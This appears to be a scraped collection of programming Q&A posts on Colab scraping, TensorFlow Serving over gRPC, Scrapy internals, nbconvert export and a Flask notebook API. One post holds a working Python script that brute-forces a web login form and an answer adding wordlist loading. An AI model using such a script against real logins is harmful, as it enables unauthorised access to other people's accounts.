Make a parser in Colab for collecting images for learning - google-colaboratory

I want to make a parser in Colab, but something is wrong.
Here is my code:
from google.colab import drive
drive.mount('/content/gdrive/')
from urllib.request import urlopen
import argparse
import requests as req
from bs4 import BeautifulSoup

# NOTE(review): root_dir is never read below; the images are written to the
# current working directory, not to this Drive folder.
root_dir = "/content/gdrive/My Drive/img/"

# The search term is a required command-line option. A notebook kernel is not
# started with it, so parse_args() prints the usage text and raises
# SystemExit(2) there (this is the error quoted after the code).
parser = argparse.ArgumentParser(description='input.')
parser.add_argument("-name", "--people", required=True)
args = parser.parse_args()
people = args.people


def main():
    """Download the <img> results of a Google image search for ``people``.

    Each image is saved in the current working directory as
    ``byeongwoo_<n>.jpg``, with ``n`` starting at 1.
    """
    url_info = "https://www.google.co.kr/search?"
    params = {
        "q": people,
        "tbm": "isch",
    }
    html_object = req.get(url_info, params)
    if html_object.status_code == 200:
        bs_object = BeautifulSoup(html_object.text, "html.parser")
        images = bs_object.find_all("img")
        # The first <img> on the page is skipped.
        for index, img in enumerate(images[1:], start=1):
            t = urlopen(img.attrs['src']).read()
            filename = "byeongwoo_" + str(index) + '.jpg'
            with open(filename, "wb") as f:
                f.write(t)
            print("Img Save Success")


if __name__ == "__main__":
    main()
And this is the error message:
usage: ipykernel_launcher.py [-h] -name PEOPLE
ipykernel_launcher.py: error: the following arguments are required: -name/--people
An exception has occurred, use %tb to see the full traceback.
SystemExit: 2
/usr/local/lib/python3.6/dist-packages/IPython/core/interactiveshell.py:2890: UserWarning: To exit: use 'exit', 'quit', or Ctrl-D.
warn("To exit: use 'exit', 'quit', or Ctrl-D.", stacklevel=1)

Related

TensorFlow Serving + gRPC "Did not read entire message"

I'm trying to call my TensorFlow model, which is deployed on a Cloud Foundry server, from a Python 2.7 API using TensorFlow Serving and gRPC. The model expects a 200-dimensional vector as input, which is hard-coded at the moment. The connection variables are stored in a virtualenv and have been checked twice.
The code:
import os
from grpc.beta import implementations
import tensorflow as tf
from tensorflow_serving.apis import predict_pb2
from tensorflow_serving.apis import prediction_service_pb2
from grpc._cython import cygrpc
# Connection settings are read from environment variables.
MODEL_NAME = str(os.getenv('MODEL_NAME', ''))
MODEL_SERVER_HOST = str(os.getenv('MODEL_SERVER_HOST', ''))
# int('') raises ValueError, so MODEL_SERVER_PORT must be set.
MODEL_SERVER_PORT = int(os.getenv('MODEL_SERVER_PORT', ''))
# Turn literal "\n" sequences in the certificate text into real newlines.
ROOT_CERT = str(os.getenv('ROOT_CERT', '')).replace('\\n', '\n')
def metadata_transformer(metadata):
    """Return the call metadata with an ``authorization`` entry appended.

    metadata: iterable of the existing metadata entries.
    Returns a tuple holding the original entries followed by the
    ``('authorization', <bearer token>)`` pair.
    """
    token = 'Bearer <my access token>'
    return tuple(metadata) + (('authorization', token),)
# Build SSL credentials from ROOT_CERT and open a secure channel to the model server.
credentials = implementations.ssl_channel_credentials(root_certificates=ROOT_CERT)
channel = implementations.secure_channel(MODEL_SERVER_HOST, MODEL_SERVER_PORT, credentials)
# The stub is created with metadata_transformer as its metadata transformer.
stub = prediction_service_pb2.beta_create_PredictionService_stub(channel, metadata_transformer=metadata_transformer)
import numpy as np
data = np.matrix([0.06222425773739815, 0.08211926370859146, -0.060986146330833435, 0.13920938968658447, 0.10515272617340088, -0.06220443174242973, -0.05927170068025589, -0.054189786314964294, -0.0986655130982399, 0.013334010727703571, -0.05667420104146004, 0.059366412460803986, -0.03483295068144798, -0.05382293462753296, 0.02721281163394451, -0.1428503543138504, 0.029297124594449997, 0.07006879895925522, 0.06501731276512146, 0.028620243072509766, 0.07128454744815826, 0.029960375279188156, 0.0710490494966507, -0.04619687795639038, -0.03106304071843624, -0.04266272485256195, 0.004348727408796549, 0.03099834732711315, 0.09248803555965424, -0.036939311772584915, 0.00017547572497278452, 0.03521900251507759, 0.10932505130767822, -0.019729139283299446, 0.12315405160188675, 0.10092845559120178, -0.12633951008319855, -0.022320391610264778, 0.0870826318860054, -0.06696301698684692, -0.016253307461738586, -0.0413096621632576, -0.040929097682237625, 0.09338817000389099, -0.08800378441810608, 0.015543102286756039, 0.018787918612360954, 0.07351260632276535, 0.038140904158353806, 0.019255049526691437, 0.0875692293047905, -0.07542476058006287, -0.04116508364677429, 0.04507743567228317, -0.06986603885889053, -0.24688798189163208, -0.035459864884614944, 0.06200174242258072, -0.06932217627763748, 0.06320516765117645, -0.023999478667974472, -0.04712359234690666, 0.03672196343541145, -0.02999514900147915, 0.04105519875884056, 0.08891177922487259, 0.15175248682498932, -0.0021488466300070286, 0.04398706927895546, -0.04429445043206215, 0.04708605632185936, 0.043234940618276596, -0.043555982410907745, 0.017381751909852028, 0.048889972269535065, -0.016929129138588905, 0.01731136068701744, -0.04694319888949394, 0.20381565392017365, 0.009074307978153229, 0.004490611143410206, -0.08525945991277695, -0.03385556861758232, 0.017475442960858345, -0.040392760187387466, 0.14970248937606812, 0.042721331119537354, -0.1257765144109726, -0.07097769528627396, -0.10943038016557693, 0.015442096628248692, 
-0.06519876420497894, -0.07588690519332886, -0.07620779424905777, 0.04572996124625206, -0.058589719235897064, -0.04492143541574478, -0.01922304928302765, -0.008066931739449501, 0.04317406192421913, 0.020763304084539413, -0.025430725887417793, 0.04271349683403969, 0.07393930852413177, 0.0020402593072503805, 0.0783640518784523, 0.047386448830366135, 0.010610940866172314, 0.022059153765439987, 0.034980181604623795, -0.006882485933601856, -0.08911270648241043, -0.001243607490323484, -0.06307544559240341, -0.01352659147232771, -0.24622271955013275, 0.07930449396371841, 0.03659113869071007, -0.05077377334237099, 0.08726480603218079, -0.09274136275053024, -0.05766649544239044, -0.12269984930753708, 0.056026071310043335, -0.0048304214142262936, -0.05568183213472366, -0.08890420943498611, -0.02911136858165264, -0.0944124087691307, 0.0011820291401818395, -0.08908636122941971, -0.008728212676942348, -0.014545259065926075, -0.008866528049111366, 0.02728298306465149, -0.020994992926716805, 0.031155599281191826, 0.036098793148994446, 0.06911332905292511, -0.06691643595695496, -0.00014896543871145695, -0.007080242037773132, 0.0031992685981094837, 0.043563224375247955, 0.02550852671265602, -0.015397937037050724, 0.06041031703352928, -0.08981014788150787, -0.10881254076957703, 0.03226703032851219, -0.02039985917508602, -0.05354547128081322, -0.026514282450079918, 0.09616094827651978, -0.04160488396883011, -0.06793050467967987, -0.17060619592666626, -0.08044841140508652, 0.042605575174093246, 0.08186516910791397, 0.026051705703139305, 0.1254323273897171, 0.09807661175727844, 0.04692094400525093, 0.05536479875445366, 0.004592049401253462, 0.01953544095158577, -0.02827763929963112, 0.11051501333713531, -0.05077047273516655, -0.09987067431211472, 0.025186538696289062, -0.24119670689105988, -0.054666098207235336, 0.03561021387577057, -0.006030901800841093, 0.14740994572639465, 0.09515859931707382, 0.0628485381603241, 0.020558597519993782, -0.04458167776465416, -0.04740617796778679, 
0.024550801143050194, -0.09533495455980301, 0.057229768484830856, -0.08855120837688446, 0.027864644303917885, -0.07248448580503464, 0.0647491067647934, 0.09660986065864563, 0.038834456354379654, -0.030274877324700356, -0.024261653423309326, 0.05457066744565964, -0.00860705878585577, 0.04901411384344101, 0.017157232388854027, -0.02722001262009144, 0.012187148444354534, 0.05596058815717697])
# Build the request for the deployed model and signature.
request = predict_pb2.PredictRequest()
request.model_spec.name = MODEL_NAME
request.model_spec.signature_name = 'ticketCatFeature2'
# The hard-coded vector is packed into a tensor proto with shape=[200].
request.inputs['input'].CopyFrom(
tf.contrib.util.make_tensor_proto(data, shape=[200]))
# NOTE(review): a PredictRequest is passed to Classify here - confirm the RPC
# matches the request type. The second argument is presumably the timeout.
print stub.Classify(request, 10)
I'm getting the following error message when running the app:
Traceback (most recent call last):
File "app.py", line 36, in
print stub.Classify(request, 10)
File "/home/vagrant/Desktop/Masterarbeit/appDir/venv/local/lib/python2.7/site-packages/grpc/beta/_client_adaptations.py", line 309, in call
self._request_serializer, self._response_deserializer)
File "/home/vagrant/Desktop/Masterarbeit/appDir/venv/local/lib/python2.7/site-packages/grpc/beta/_client_adaptations.py", line 195, in _blocking_unary_unary
raise _abortion_error(rpc_error_call)
grpc.framework.interfaces.face.face.AbortionError: AbortionError(code=StatusCode.INTERNAL, details="Did not read entire message")
Log of grpc Debug: https://ufile.io/owk76

How does scrapy crawl work: which class is instantiated and which method is called?

Here is a simple python file--test.py.
import math


class myClass():
    """Minimal example class exposing a square-root method."""

    def myFun(self, x):
        """Return the square root of ``x`` as a float."""
        return math.sqrt(x)


if __name__ == "__main__":
    myInstance = myClass()
    print(myInstance.myFun(9))
Running python test.py prints 3.0. Let's analyse the running process:
1. myClass is instantiated and the instance is assigned to myInstance.
2. The myFun method is called and the result is printed.
Now it is Scrapy's turn.
In the Scrapy 1.4 manual, quotes_spider.py is as below.
import scrapy
class QuotesSpider(scrapy.Spider):
    """Spider that requests two quote pages and saves each one to a file."""

    name = "quotes"

    def start_requests(self):
        """Yield one request per URL, each with ``parse`` as its callback."""
        urls = [
            'http://quotes.toscrape.com/page/1/',
            'http://quotes.toscrape.com/page/2/',
        ]
        for url in urls:
            yield scrapy.Request(url=url, callback=self.parse)

    def parse(self, response):
        """Write the response body to ``quotes-<page>.html`` and log it."""
        # The page number is the second-to-last segment of the URL path.
        page = response.url.split("/")[-2]
        filename = 'quotes-%s.html' % page
        with open(filename, 'wb') as f:
            f.write(response.body)
        self.log('Saved file %s' % filename)
When I run the spider with scrapy crawl quotes, I am puzzled:
1. Where is the main function or main body of the spider?
2. Which class is instantiated?
3. Which method is called?
mySpider = QuotesSpider(scrapy.Spider)
mySpider.parse(response)
How scrapy crawl work exactly?
So let's start. Assuming you use Linux/macOS, let's check where scrapy is:
$ which scrapy
/Users/tarun.lalwani/.virtualenvs/myproject/bin/scrapy
Let's look at the content of this file
$ cat /Users/tarun.lalwani/.virtualenvs/myproject/bin/scrapy
#!/Users/tarun.lalwani/.virtualenvs/myproject/bin/python3.6
# -*- coding: utf-8 -*-
import re
import sys

from scrapy.cmdline import execute

if __name__ == '__main__':
    # Strip a trailing "-script.py", "-script.pyw" or ".exe" from the program
    # name, then hand over to Scrapy's command-line entry point.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(execute())
So this calls the execute function from cmdline.py, and here is your main method.
cmdline.py
from __future__ import print_function
....
....
def execute(argv=None, settings=None):
    """Run the Scrapy command named in ``argv`` and exit with its exit code.

    argv: argument list; defaults to ``sys.argv``.
    settings: settings object; defaults to the project settings.
    """
    if argv is None:
        argv = sys.argv

    # --- backwards compatibility for scrapy.conf.settings singleton ---
    if settings is None and 'scrapy.conf' in sys.modules:
        from scrapy import conf
        if hasattr(conf, 'settings'):
            settings = conf.settings
    # ------------------------------------------------------------------

    if settings is None:
        settings = get_project_settings()
        # set EDITOR from environment if available
        try:
            editor = os.environ['EDITOR']
        except KeyError: pass
        else:
            settings['EDITOR'] = editor
    check_deprecated_settings(settings)

    # --- backwards compatibility for scrapy.conf.settings singleton ---
    import warnings
    from scrapy.exceptions import ScrapyDeprecationWarning
    with warnings.catch_warnings():
        warnings.simplefilter("ignore", ScrapyDeprecationWarning)
        from scrapy import conf
        conf.settings = settings
    # ------------------------------------------------------------------

    inproject = inside_project()
    cmds = _get_commands_dict(settings, inproject)
    cmdname = _pop_command_name(argv)
    parser = optparse.OptionParser(formatter=optparse.TitledHelpFormatter(), \
        conflict_handler='resolve')
    # No command prints the command list; an unknown one exits with status 2.
    if not cmdname:
        _print_commands(settings, inproject)
        sys.exit(0)
    elif cmdname not in cmds:
        _print_unknown_command(settings, cmdname, inproject)
        sys.exit(2)

    cmd = cmds[cmdname]
    parser.usage = "scrapy %s %s" % (cmdname, cmd.syntax())
    parser.description = cmd.long_desc()
    settings.setdict(cmd.default_settings, priority='command')
    cmd.settings = settings
    cmd.add_options(parser)
    opts, args = parser.parse_args(args=argv[1:])
    _run_print_help(parser, cmd.process_options, args, opts)

    cmd.crawler_process = CrawlerProcess(settings)
    _run_print_help(parser, _run_command, cmd, args, opts)
    sys.exit(cmd.exitcode)


if __name__ == '__main__':
    execute()
Now, if you look at the execute function, it processes the arguments you passed, which are crawl quotes in your case. It scans the project for spider classes and finds the one whose name is defined as quotes. It then creates the CrawlerProcess instance, and that runs the whole show.
Scrapy is based on the Twisted Python framework, which is a scheduler-based framework.
Consider the part of the code below:
for url in urls:
yield scrapy.Request(url=url, callback=self.parse)
When the engine executes this function and the first yield is executed, the value is returned to the engine. The engine then looks at the other pending tasks and executes them (when they yield, some other function in the pending task queue gets a chance). So yield is what allows a function's execution to be broken into parts, and that helps Scrapy/Twisted work.
You can get a detailed overview on the link below
https://doc.scrapy.org/en/latest/topics/architecture.html

minimal example of how to export a jupyter notebook to pdf using nbconvert and PDFExporter()

I am trying to export a pdf copy of a jupyter notebook using nbconvert from within a notebook cell. I have read the documentation, but I just cannot find some basic code to actually execute the nbconvert command and export to pdf.
I was able to get this far, but I was hoping that someone could just fill in the final gaps.
from nbconvert import PDFExporter
# Create the exporter and point it at a custom template file.
notebook_pdf = PDFExporter()
notebook_pdf.template_file = '../print_script/pdf_nocode.tplx'
Not sure how to get from here to actually getting the PDF created.
Any help would be appreciated.
I'm no expert, but managed to get this working. The key is that you need to preprocess the notebook which will allow you to use the PDFExporter.from_notebook_node() function. This will give you your pdf_data in byte format that can then be written to file:
import nbformat
from nbconvert.preprocessors import ExecutePreprocessor
from nbconvert import PDFExporter

notebook_filename = "notebook.ipynb"

# Load the notebook as an nbformat v4 node.
with open(notebook_filename) as f:
    nb = nbformat.read(f, as_version=4)

# Run the notebook's cells before exporting; the second argument is the
# resources dict passed to the preprocessor.
ep = ExecutePreprocessor(timeout=600, kernel_name='python3')
ep.preprocess(nb, {'metadata': {'path': 'notebooks/'}})

# from_notebook_node returns the PDF as bytes plus a resources dict.
pdf_exporter = PDFExporter()
pdf_data, resources = pdf_exporter.from_notebook_node(nb)

# The with-block closes the file, so no explicit close() is needed.
with open("notebook.pdf", "wb") as f:
    f.write(pdf_data)
It's worth noting that the ExecutePreprocessor requires the resources dict, but we don't use it in this example.
The following is a REST API that converts an .ipynb file into .html:
POST: http://URL/export/<id> converts <id>.ipynb into <id>.html
GET: http://URL/export/<id> returns <id>.html
import os
from flask import Flask, render_template, make_response
from flask_cors import CORS
from flask_restful import reqparse, abort, Api, Resource
from nbconvert.exporters import HTMLExporter
# Exporter instance shared by the request handlers.
exporter = HTMLExporter()
app = Flask(__name__)
# Allow cross-origin requests from any origin on the /export/ routes.
cors = CORS(app, resources={r"/export/*": {"origins": "*"}})
api = Api(app)
# Request parser that accepts a 'path' argument.
parser = reqparse.RequestParser()
parser.add_argument('path')
# Location of the .ipynb files on the server (placeholder value).
notebook_file_srv = '/path of your .ipynb file'
def notebook_doesnt_exist(nb):
    """Abort the current request with a 404 naming the missing notebook."""
    abort(404, message="Notebook {} doesn't exist".format(nb))
class Notebook(Resource):
    """REST resource that exports a notebook to HTML and serves the result."""

    def get(self, id):
        """Render the previously exported ``<id>.html`` template."""
        headers = {'Content-Type': 'text/html'}
        return make_response(render_template(id + '.html'), 200, headers)

    def post(self, id):
        """Export ``<id>.ipynb`` to ``templates/<id>.html``.

        Returns ``('done', 201)`` on success, or a 404 message when the
        notebook file does not exist.
        """
        # The request is still parsed, but the 'path' value is not used: the
        # original code overwrote it immediately with the path built from id.
        parser.parse_args()
        # os.path.join works whether or not notebook_file_srv ends in a
        # separator; plain concatenation glued the id onto the directory name.
        notebook_file = os.path.join(notebook_file_srv, id + '.ipynb')
        if not os.path.exists(notebook_file):
            return 'notebook \'.ipynb\' file not found', 404

        nb_name, _ = os.path.splitext(os.path.basename(notebook_file))
        # Write next to this module, in the folder render_template reads from.
        output_path = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'templates')
        output_path = os.path.join(output_path, '{}.html'.format(nb_name))
        output, resources = exporter.from_filename(notebook_file)
        with open(output_path, 'wb') as f:
            f.write(output.encode('utf8'))
        return 'done', 201
# Route /export/<id> to the Notebook resource.
api.add_resource(Notebook, '/export/<id>')

if __name__ == '__main__':
    app.run(debug=True)

How to load passwords from a wordlist for web-form login?

I have this Python script that bruteforces a web-form (login) using itertools.
How would I replace the bruteforce/dictionary generation process with a load-passwords-from-wordlist.txt feature?
My code:
#!/usr/bin/python
import mechanize
import itertools
br = mechanize.Browser()
br.set_handle_equiv(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
combos = itertools.permutations("a-zA-Z",5)
r = br.open("http://example.com/login")
for x in combos:
br.select_form(nr = 0)
br.form['username'] = "my_username_123"
br.form['password'] = ''.join(x)
print "Checking ",br.form['password']
response = br.submit()
if response.geturl()!="http://example.com/login":
print "Correct password is ",''.join(x)
break
Something like this could be added so that, if a password file is given on the command line, it is used instead of the generated combinations.
Example: python script.py password.txt
import sys
import os
if len(sys.argv) > 1:
if os.path.exists(sys.argv[1]):
combos = [line.strip() for line in open(sys.argv[1])]
else:
print "[-] File not found"
sys.exit(0)
else:
combos = itertools.permutations("a-zA-Z",5)

Why does my CrawlerProcess not have the function "crawl"?

import scrapy
from scrapy.crawler import CrawlerProcess
from scrapy.contrib.spiders import CrawlSpider, Rule
from scrapy.contrib.linkextractors import LinkExtractor
from items import BackpageItem, CityvibeItem
from scrapy.shell import inspect_response
import re
import time
import sys
class MySpider(CrawlSpider):
    """Crawl the listing pages and extract one item per linked post."""

    name = 'example'
    allowed_domains = ['www.example.com']
    # Set last_page to decide how many pages are crawled
    last_page = 10
    start_urls = ['http://www.example.com/washington/?page=%s' % page for page in xrange(1,last_page)]
    rules = (
        # Follow every <a name="listing_link"> and call parse_item on each link.
        # XPath attribute tests use "@"; the "#" in the pasted selectors is
        # not valid XPath.
        Rule(LinkExtractor(
            restrict_xpaths=('//a[@name="listing_link"]')),
            callback='parse_item'),
    )

    # Extract relevant text from the website into an ExampleItem
    def parse_item(self, response):
        """Build and return an item from a single post page."""
        # NOTE(review): ExampleItem is not among the names imported from
        # items in this snippet - confirm where it is defined.
        item = ExampleItem()
        item['title'] = response.xpath('string(//h2[@class="post-title"]/text())').extract()
        item['desc'] = response.xpath('string(//div[@class="section post-body"]/text())').extract()
        item['url'] = response.url
        item['location'] = response.xpath('string(//div[@class="posting"]/div[2]/text())').extract()
        item['posted_date'] = response.xpath('string(//div[@class="post-date"]/span/text())').extract()#.re("(?<=Posted\s*).*")
        item['crawled_date'] = time.strftime("%c")
        # not sure how to get the other image urls right now
        item['image_urls'] = response.xpath('string(//div[@class="section post-contact-container"]/div/div/img/@src)').extract()
        # I can't find this section on any pages right now
        item['other_ad_urls'] = response.xpath('//a[@name="listing_link"]/@href').extract()
        item['phone_number'] = "".join(response.xpath('//div[@class="post-info"]/span[contains(text(), "Phone")]/following-sibling::a/text()').extract())
        item['email'] = "".join(response.xpath('//div[@class="post-info"]/span[contains(text(), "Email")]/following-sibling::a/text()').extract())
        item['website'] = "".join(response.xpath('//div[@class="post-info limit"]/span[contains(text(), "Website")]/following-sibling::a/text()').extract())
        item['name'] = response.xpath('//div[@class="post-name"]/text()').extract()
        #uncomment for debugging
        #inspect_response(response, self)
        return item
# process1 = CrawlerProcess({
# 'ITEM_PIPELINES': {
# #'scrapy.contrib.pipeline.images.ImagesPipeline': 1
# 'backpage.pipelines.GeolocationPipeline': 4,
# 'backpage.pipelines.LocationExtractionPipeline': 3,
# 'backpage.pipelines.BackpagePipeline': 5
# }
# });
# Create a crawler process with a custom user agent setting.
process1 = CrawlerProcess({
'USER_AGENT': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'
})
# Register MySpider with the process, then start it.
process1.crawl(MySpider)
process1.start()
My spider works perfectly when I run it from the command line with
scrapy crawl example
but I will need to run multiple spiders, so I want to put them all in a script and use CrawlerProcess. When I try to run this I get the error,
AttributeError: 'CrawlerProcess' object has no attribute 'crawl'
This is scrapy version 0.24.6.
All items and pipelines are correct, because the spider works from the command line.
There is (was?) a compatibility problem between Scrapy and Scrapyd. I needed to run Scrapy 0.24 and Scrapyd 1.0.1.
Here is the issue on Github
https://github.com/scrapy/scrapyd/issues/100#issuecomment-115268880